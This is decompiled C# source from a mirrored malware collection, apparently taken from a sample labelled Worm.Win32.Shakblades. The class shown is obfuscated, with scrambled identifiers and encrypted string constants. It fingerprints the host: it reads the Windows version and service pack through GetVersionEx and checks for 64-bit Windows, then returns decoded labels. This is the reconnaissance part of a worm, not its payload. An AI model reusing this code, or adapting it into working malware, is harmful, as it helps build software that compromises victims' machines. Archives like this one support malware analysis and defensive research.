mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
116 lines
5.9 KiB
C#
116 lines
5.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.៷˴ᄨᥨᗽ
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
internal class \u17F7\u02F4ᄨᥨᗽ
|
|||
|
{
|
|||
|
public static string ఽ\u087CᏃ()
|
|||
|
{
|
|||
|
OperatingSystem osVersion = Environment.OSVersion;
|
|||
|
string str = "";
|
|||
|
if (osVersion.Platform.ToString() == "Win32NT")
|
|||
|
{
|
|||
|
switch (\u17F7\u02F4ᄨᥨᗽ.\u0AE7ԵॻƂẺႦᛀળ(osVersion.Version))
|
|||
|
{
|
|||
|
case "4.1.2222":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEfYO8ENT0v4ERA=", true);
|
|||
|
break;
|
|||
|
case "4.1.2600":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEdP2DvBDUv4ERArHQ==", true);
|
|||
|
break;
|
|||
|
case "4.9.3000":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("[WINME]", true);
|
|||
|
break;
|
|||
|
case "5.0.2195":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEdP2DvBDUv4CggICA==", true);
|
|||
|
break;
|
|||
|
case "5.1.2600":
|
|||
|
case "5.2.3790":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEfYO8ENT0v4MCg=", true);
|
|||
|
break;
|
|||
|
case "6.0.6000":
|
|||
|
case "6.0.6001":
|
|||
|
case "6.0.6002":
|
|||
|
case "6.0.6003":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("+w0SCBMbpHuKjhfE+g0XGAU=", true);
|
|||
|
break;
|
|||
|
case "6.1.7600":
|
|||
|
case "6.1.7601":
|
|||
|
case "6.1.7602":
|
|||
|
case "6.1.7603":
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("+w0SCKR7io4TGxfE2w==", true);
|
|||
|
break;
|
|||
|
default:
|
|||
|
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("+RIPpHuKjhITGxI=", true);
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
string empty = string.Empty;
|
|||
|
\u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ ᴀᅒਗ਼ߎᘘᒯܡᤄ = new \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ();
|
|||
|
ᴀᅒਗ਼ߎᘘᒯܡᤄ.ܨ = Marshal.SizeOf(typeof (\u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ));
|
|||
|
if (\u17F7\u02F4ᄨᥨᗽ.ᰐረἣە\u104C(ref ᴀᅒਗ਼ߎᘘᒯܡᤄ))
|
|||
|
{
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DR", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEk=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DS", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEo=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DT", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEs=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DU", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEw=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DV", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE0=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DW", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE4=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DX", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE8=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("a32KjoF7fRhXNLA4aHl7gzhQ", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iLtoXUo8uKA=", true);
|
|||
|
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("a32KjoF7fRhXNLA4aHl7gzhR", true)))
|
|||
|
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iLtoXUo8uKE=", true);
|
|||
|
}
|
|||
|
return !\u17F7\u02F4ᄨᥨᗽ.ᣁ() ? str + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCgng==", true) : str + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCenA==", true);
|
|||
|
}
|
|||
|
|
|||
|
private static string \u0AE7ԵॻƂẺႦᛀળ(Version _param0) => _param0.Major.ToString() + "." + _param0.Minor.ToString() + "." + _param0.Build.ToString();
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetVersionEx")]
|
|||
|
private static extern bool ᰐረἣە\u104C(ref \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ _param0);
|
|||
|
|
|||
|
public static bool ᣁ()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432"));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
return false;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public struct ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ
|
|||
|
{
|
|||
|
public int ܨ;
|
|||
|
public int \u003Fᵚᇛჩᬃഢᨨ\u00F7;
|
|||
|
public int தጢ\u104Bᥞᶑᄧ᭐ώ\u0040;
|
|||
|
public int ᔥڟ;
|
|||
|
public int ṏÕấᮺ\u087D;
|
|||
|
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
|
|||
|
public string \u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E;
|
|||
|
public short ƹᗰ\u0FC0\u0A56uᅜ;
|
|||
|
public short \u0F72ြॽӰᢟ͒ᣃẈᅂ;
|
|||
|
public short \u0F30ṋᄆᆃẈҤ;
|
|||
|
public byte \u1CED\u0EF0\u0B9BŢᵕ\u1398᩵ᗀἱ;
|
|||
|
public byte \u1DC7ഛեᮈ\u0FD9;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|